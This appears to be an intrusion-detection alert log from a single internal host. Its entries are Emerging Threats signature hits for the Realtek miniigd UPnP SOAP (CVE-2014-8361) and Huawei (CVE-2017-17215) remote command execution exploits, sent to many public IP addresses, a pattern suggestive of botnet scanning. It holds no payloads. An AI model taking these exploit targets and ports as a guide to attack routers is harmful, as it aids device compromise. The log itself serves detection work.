                                                07/20/24-23:06:56.433850TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25386052869192.168.2.14165.79.131.219
                                                07/20/24-23:05:56.351675TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615906252869192.168.2.14205.123.194.218
                                                07/20/24-23:06:27.562825TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24173852869192.168.2.14171.33.218.139
                                                07/20/24-23:06:52.775382TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614987252869192.168.2.14144.112.88.196
                                                07/20/24-23:05:52.483885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25301252869192.168.2.1438.95.213.57
                                                07/20/24-23:06:06.209030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3998452869192.168.2.14217.194.22.37
                                                07/20/24-23:05:48.763323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925637215192.168.2.14197.252.142.164
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572837215192.168.2.14157.150.49.40
                                                07/20/24-23:05:34.627950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435637215192.168.2.1441.52.176.189
                                                07/20/24-23:05:37.441297TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3796852869192.168.2.14148.30.198.131
                                                07/20/24-23:05:36.354373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511237215192.168.2.14157.130.50.76
                                                07/20/24-23:05:37.556915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3752252869192.168.2.14185.59.206.117
                                                07/20/24-23:06:08.201235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23486052869192.168.2.14198.167.28.174
                                                07/20/24-23:06:00.139140TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23534852869192.168.2.14194.142.88.245
                                                07/20/24-23:05:42.245949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137837215192.168.2.14197.255.225.75
                                                07/20/24-23:05:39.612058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5417052869192.168.2.1473.43.58.179
                                                07/20/24-23:06:24.267901TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614635652869192.168.2.14192.103.53.212
                                                07/20/24-23:05:50.479091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066037215192.168.2.14157.25.144.118
                                                07/20/24-23:06:08.403626TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614381852869192.168.2.14152.114.75.44
                                                07/20/24-23:06:03.741704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5047252869192.168.2.14161.82.139.62
                                                07/20/24-23:06:26.022416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5635652869192.168.2.14113.70.115.254
                                                07/20/24-23:05:35.517370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3326252869192.168.2.14210.141.252.193
                                                07/20/24-23:06:04.439088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23740652869192.168.2.1449.163.219.249
                                                07/20/24-23:06:02.427717TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614083652869192.168.2.1431.89.98.146
                                                07/20/24-23:06:27.685490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614750252869192.168.2.1435.230.101.186
                                                07/20/24-23:06:03.718240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615655052869192.168.2.14162.196.84.240
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312437215192.168.2.14197.34.124.168
                                                07/20/24-23:05:57.143736TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24631852869192.168.2.14132.82.133.46
                                                07/20/24-23:05:57.641730TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5442452869192.168.2.1412.166.141.196
                                                07/20/24-23:05:35.614585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3992852869192.168.2.1470.251.155.61
                                                07/20/24-23:05:35.712014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5416452869192.168.2.14113.211.98.23
                                                07/20/24-23:05:45.357082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246437215192.168.2.1464.198.94.103
                                                07/20/24-23:06:02.432404TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4070652869192.168.2.14176.29.173.73
                                                07/20/24-23:05:35.482812TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615074052869192.168.2.14105.87.255.111
                                                07/20/24-23:05:45.287494TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615546252869192.168.2.1448.13.21.145
                                                07/20/24-23:05:46.438139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614776252869192.168.2.14131.30.152.0
                                                07/20/24-23:06:00.257590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3461252869192.168.2.1478.127.105.181
                                                07/20/24-23:05:52.515632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4529852869192.168.2.1494.25.11.127
                                                07/20/24-23:05:38.027779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5292652869192.168.2.14125.85.162.236
                                                07/20/24-23:05:45.439166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676237215192.168.2.14157.103.103.96
                                                07/20/24-23:05:47.438205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4728652869192.168.2.14183.7.180.129
                                                07/20/24-23:06:17.564288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613883852869192.168.2.1496.182.113.188
                                                07/20/24-23:06:06.967288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26022452869192.168.2.14133.98.16.57
                                                07/20/24-23:06:34.302136TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25899452869192.168.2.14208.101.156.156
                                                07/20/24-23:06:13.512424TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23989652869192.168.2.14188.244.73.220
                                                07/20/24-23:05:39.055909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564037215192.168.2.1441.83.228.225
                                                07/20/24-23:05:44.721858TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613560452869192.168.2.14212.82.101.165
                                                07/20/24-23:06:11.221707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5129852869192.168.2.14115.182.22.138
                                                07/20/24-23:05:40.338978TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23739252869192.168.2.1445.131.99.6
                                                07/20/24-23:06:34.302136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5364252869192.168.2.1419.117.177.221
                                                07/20/24-23:05:44.992160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3902652869192.168.2.14218.180.53.12
                                                07/20/24-23:05:52.450049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25486852869192.168.2.14163.111.67.44
                                                07/20/24-23:06:11.328788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615476652869192.168.2.14155.131.182.139
                                                07/20/24-23:05:40.483612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4057652869192.168.2.1464.129.250.95
                                                07/20/24-23:05:56.227561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538852869192.168.2.14163.139.96.29
                                                07/20/24-23:05:59.106017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5757452869192.168.2.1452.242.228.39
                                                07/20/24-23:06:01.613195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5420252869192.168.2.1412.167.125.66
                                                07/20/24-23:05:38.089846TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613615652869192.168.2.14161.126.18.243
                                                07/20/24-23:05:52.460913TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25585052869192.168.2.1473.182.112.4
                                                07/20/24-23:06:01.996519TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614819252869192.168.2.142.42.46.69
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981637215192.168.2.1441.177.215.233
                                                07/20/24-23:05:37.454500TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24478452869192.168.2.1436.164.151.170
                                                07/20/24-23:05:45.429987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614837215192.168.2.14120.107.134.124
                                                07/20/24-23:06:06.458215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614822452869192.168.2.1480.41.81.201
                                                07/20/24-23:06:03.015672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3939652869192.168.2.1472.33.167.45
                                                07/20/24-23:05:38.548040TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3307452869192.168.2.14166.187.21.85
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672437215192.168.2.14197.120.37.59
                                                07/20/24-23:05:42.257817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543437215192.168.2.14219.110.127.52
                                                07/20/24-23:05:35.589736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615576452869192.168.2.14199.202.13.130
                                                07/20/24-23:05:58.383835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3463252869192.168.2.14221.158.4.113
                                                07/20/24-23:06:12.244446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3433052869192.168.2.14134.6.131.96
                                                07/20/24-23:06:18.534267TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613825452869192.168.2.14175.8.39.110
                                                07/20/24-23:05:37.464931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4614252869192.168.2.1483.71.51.102
                                                07/20/24-23:05:52.499861TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25747452869192.168.2.1457.176.228.98
                                                07/20/24-23:05:35.245416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614514252869192.168.2.1496.209.69.20
                                                07/20/24-23:06:01.997543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3602852869192.168.2.1448.95.62.86
                                                07/20/24-23:05:37.493635TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24372052869192.168.2.14154.64.178.0
                                                07/20/24-23:06:14.126981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615750652869192.168.2.1485.210.44.216
                                                07/20/24-23:05:37.445622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6096252869192.168.2.1424.245.120.74
                                                07/20/24-23:06:09.587283TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25769852869192.168.2.14222.190.96.116
                                                07/20/24-23:06:25.528399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613937052869192.168.2.14106.241.46.107
                                                07/20/24-23:05:45.205397TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614178252869192.168.2.14139.106.80.144
                                                07/20/24-23:06:29.518689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4100252869192.168.2.1436.88.46.17
                                                07/20/24-23:05:39.620310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614711452869192.168.2.1469.91.98.213
                                                07/20/24-23:05:52.442221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4841452869192.168.2.1431.172.196.201
                                                07/20/24-23:06:01.631607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613761452869192.168.2.14219.82.29.79
                                                07/20/24-23:06:01.831222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24873052869192.168.2.14191.99.26.134
                                                07/20/24-23:06:11.420819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312852869192.168.2.14152.108.253.32
                                                07/20/24-23:06:02.606013TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614014452869192.168.2.1447.168.17.153
                                                07/20/24-23:06:06.595669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614790052869192.168.2.14168.156.209.183
                                                07/20/24-23:06:18.694959TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4633052869192.168.2.1435.63.184.244
                                                07/20/24-23:05:59.823104TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23562452869192.168.2.14126.248.230.246
                                                07/20/24-23:06:05.313786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4910452869192.168.2.14126.250.149.64
                                                07/20/24-23:05:33.829339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14197.40.168.196
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125037215192.168.2.14197.127.185.220
                                                07/20/24-23:05:58.192346TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4329452869192.168.2.14105.53.110.200
                                                07/20/24-23:05:37.524062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4199252869192.168.2.14163.170.37.61
                                                07/20/24-23:06:54.322182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4441852869192.168.2.14123.193.150.74
                                                07/20/24-23:05:39.047734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243437215192.168.2.1441.84.125.43
                                                07/20/24-23:05:58.962395TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787252869192.168.2.1462.106.120.156
                                                07/20/24-23:06:07.862885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159852869192.168.2.145.53.15.23
                                                07/20/24-23:05:57.648413TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613305052869192.168.2.1499.232.17.115
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708037215192.168.2.14157.80.165.23
                                                07/20/24-23:06:13.663932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6041652869192.168.2.14204.180.211.11
                                                07/20/24-23:05:57.658473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25142252869192.168.2.14108.229.127.235
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127237215192.168.2.14157.194.67.142
                                                07/20/24-23:05:37.591367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24605052869192.168.2.1423.55.138.59
                                                07/20/24-23:06:08.320378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4773252869192.168.2.14198.60.250.215
                                                07/20/24-23:08:34.140430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3736652869192.168.2.1453.65.45.168
                                                07/20/24-23:05:47.347764TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4078652869192.168.2.14134.147.18.133
                                                07/20/24-23:05:48.020423TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4788252869192.168.2.1499.123.61.15
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121637215192.168.2.1441.138.23.103
                                                07/20/24-23:06:14.554681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614471452869192.168.2.14206.201.63.188
                                                07/20/24-23:05:56.120599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361637215192.168.2.14153.244.224.163
                                                07/20/24-23:05:59.361832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5761052869192.168.2.14191.54.159.112
                                                07/20/24-23:05:37.524062TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24923652869192.168.2.14155.49.251.8
                                                07/20/24-23:06:29.032977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614553252869192.168.2.1481.227.7.243
                                                07/20/24-23:06:01.878715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3831452869192.168.2.1412.80.117.177
                                                07/20/24-23:06:17.581336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3586852869192.168.2.1493.176.111.22
                                                07/20/24-23:06:16.291387TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615123852869192.168.2.14136.95.221.237
                                                07/20/24-23:06:51.585302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5110452869192.168.2.14163.16.179.111
                                                07/20/24-23:07:16.958571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23458852869192.168.2.1476.98.41.108
                                                07/20/24-23:05:36.037160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5230452869192.168.2.14168.85.33.243
                                                07/20/24-23:05:47.404229TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613934052869192.168.2.14108.181.93.166
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878037215192.168.2.14197.208.99.114
                                                07/20/24-23:06:03.269499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4196852869192.168.2.1471.171.254.193
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4477237215192.168.2.1474.191.85.207
                                                07/20/24-23:06:01.003958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4890452869192.168.2.1462.163.164.84
                                                07/20/24-23:05:58.417626TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615963252869192.168.2.14100.53.98.16
                                                07/20/24-23:06:31.522075TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614146652869192.168.2.1491.134.220.118
                                                07/20/24-23:05:33.852857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.14211.45.136.152
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935437215192.168.2.1441.52.157.191
                                                07/20/24-23:06:22.925505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4840252869192.168.2.14188.110.171.215
                                                07/20/24-23:05:57.892457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615714652869192.168.2.14197.203.241.220
                                                07/20/24-23:05:39.754007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908637215192.168.2.14157.83.85.147
                                                07/20/24-23:05:36.367020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5836452869192.168.2.1452.192.238.227
                                                07/20/24-23:05:38.953643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182637215192.168.2.14197.247.74.72
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515237215192.168.2.14197.89.124.156
                                                07/20/24-23:05:55.858612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737637215192.168.2.14157.156.192.87
                                                07/20/24-23:05:52.502844TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006052869192.168.2.1499.205.208.39
                                                07/20/24-23:05:56.124566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5889437215192.168.2.14157.251.203.57
                                                07/20/24-23:06:02.175840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3673252869192.168.2.14135.213.61.54
                                                07/20/24-23:06:02.938370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3877652869192.168.2.14203.213.32.135
                                                07/20/24-23:07:27.998136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615659052869192.168.2.1468.208.168.253
                                                07/20/24-23:05:52.443193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5124652869192.168.2.14182.111.218.236
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526837215192.168.2.14157.74.195.83
                                                07/20/24-23:05:39.636140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5348252869192.168.2.14125.204.161.195
                                                07/20/24-23:05:47.086079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052037215192.168.2.1441.128.226.219
                                                07/20/24-23:05:56.430318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3786452869192.168.2.14207.111.101.15
                                                07/20/24-23:06:01.139544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5866652869192.168.2.14160.54.17.66
                                                07/20/24-23:05:59.068836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613687452869192.168.2.14132.191.29.38
                                                07/20/24-23:05:52.537891TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25917052869192.168.2.14222.40.126.158
                                                07/20/24-23:05:58.549030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4483652869192.168.2.1423.1.60.167
                                                07/20/24-23:06:23.035057TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5861652869192.168.2.1488.208.37.173
                                                07/20/24-23:05:39.035942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691437215192.168.2.14197.224.252.181
                                                07/20/24-23:05:57.132087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5390452869192.168.2.14222.37.53.103
                                                07/20/24-23:06:09.675612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002652869192.168.2.14132.43.139.216
                                                07/20/24-23:05:42.245949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884637215192.168.2.1441.39.110.63
                                                07/20/24-23:05:45.582882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4709252869192.168.2.14126.177.224.75
                                                07/20/24-23:05:59.727506TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615227252869192.168.2.1442.150.243.146
                                                07/20/24-23:06:31.826739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615618052869192.168.2.14104.60.110.252
                                                07/20/24-23:06:11.221707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25974852869192.168.2.1465.1.182.111
                                                07/20/24-23:06:11.280683TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615428652869192.168.2.1432.47.76.192
                                                07/20/24-23:05:59.273796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615573852869192.168.2.14101.243.190.245
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276237215192.168.2.14177.100.154.113
                                                07/20/24-23:05:35.755759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5482852869192.168.2.14195.182.30.127
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756837215192.168.2.14170.95.226.52
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998037215192.168.2.1441.238.130.131
                                                07/20/24-23:06:01.192858TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26095452869192.168.2.14218.31.236.194
                                                07/20/24-23:05:37.442841TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25782452869192.168.2.144.162.121.105
                                                07/20/24-23:05:40.377377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23780852869192.168.2.1454.192.129.153
                                                07/20/24-23:06:08.587454TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5999852869192.168.2.1466.176.206.152
                                                07/20/24-23:05:36.028871TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615947652869192.168.2.14175.166.165.48
                                                07/20/24-23:05:38.701210TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4565052869192.168.2.14105.51.193.210
                                                07/20/24-23:05:37.453622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23629652869192.168.2.1431.136.109.228
                                                07/20/24-23:05:36.361899TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3937252869192.168.2.1498.139.133.85
